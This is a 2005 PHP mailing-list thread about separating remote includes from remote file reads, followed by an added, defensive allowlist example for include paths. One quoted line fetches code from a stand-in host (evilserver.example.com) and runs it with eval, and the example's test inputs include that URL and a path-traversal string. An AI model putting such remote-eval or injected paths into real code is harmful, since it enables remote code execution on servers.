On Thursday 03 March 2005 03:04, Richard Lynch wrote:
> Tom Z Meinlschmidt wrote:
> > Tell me - how do you want to turn off remote includes and remain
> > remote file working?
>
> Change the PHP source?
>
> That's the only viable answer I can think of; though I doubt it's one
> you want to hear/use.
>
> Sorry.

Funnily enough I think you'll find that he did (change the source) :)

> > allow_url_fopen turns off _both_. There's no choice what to disable
>
> Consider this:
>
> <?php
> eval(implode('',file("http://evilserver.example.com")));
> ?>
>
> So, like, what's the point to turning off only remote include and
> keeping remote file?

I believe you're missing the point of the patch. It is to prevent people
from injecting malicious remote locations in $somewhere:

  include($somewhere);

Of course one should always validate $somewhere before using it but ...

--
Jason Wong -> Gremlins Associates -> www.gremlins.biz
Open Source Software Systems Integrators
* Web Design & Hosting * Internet & Intranet Applications Development *
------------------------------------------
Search the list archives before you post
http://marc.theaimsgroup.com/?l=php-general
------------------------------------------
New Year Resolution: Ignore top posted posts

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
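
The validation of $somewhere that the message above mentions, sketched as an added example that is not part of the original thread or of the patch under discussion. The function name resolve_include, the allowlist, the temporary directory and the sample inputs are all constructed for illustration:

```php
<?php
// Added example (not from the thread). Allowlist and directory are hypothetical.

/** Return the absolute local path to include for $name, or null if rejected. */
function resolve_include(string $name, string $baseDir, array $allowed): ?string
{
    // Exact allowlist match: "http://...", "../x" and similar never match.
    if (!in_array($name, $allowed, true)) {
        return null;
    }
    // Defence in depth: the resolved file must exist inside $baseDir.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Constructed demo: a temporary page directory holding one page.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pages_' . getmypid();
@mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'about.php', "<?php echo 'about page', PHP_EOL;\n");

// Constructed inputs standing in for a request-supplied $somewhere.
$samples = ['about', 'http://evilserver.example.com/', '../../etc/passwd', 'missing'];
foreach ($samples as $somewhere) {
    $path = resolve_include($somewhere, $dir, ['about', 'missing']);
    if ($path === null) {
        echo "rejected: $somewhere", PHP_EOL;
        continue;
    }
    include $path; // only reached for an allowlisted, local, existing file
}

// Clean up the constructed demo files.
unlink($dir . DIRECTORY_SEPARATOR . 'about.php');
rmdir($dir);
```

Because the request value is only ever compared against the allowlist and never concatenated into the include path unchecked, the check does not depend on how allow_url_fopen is set.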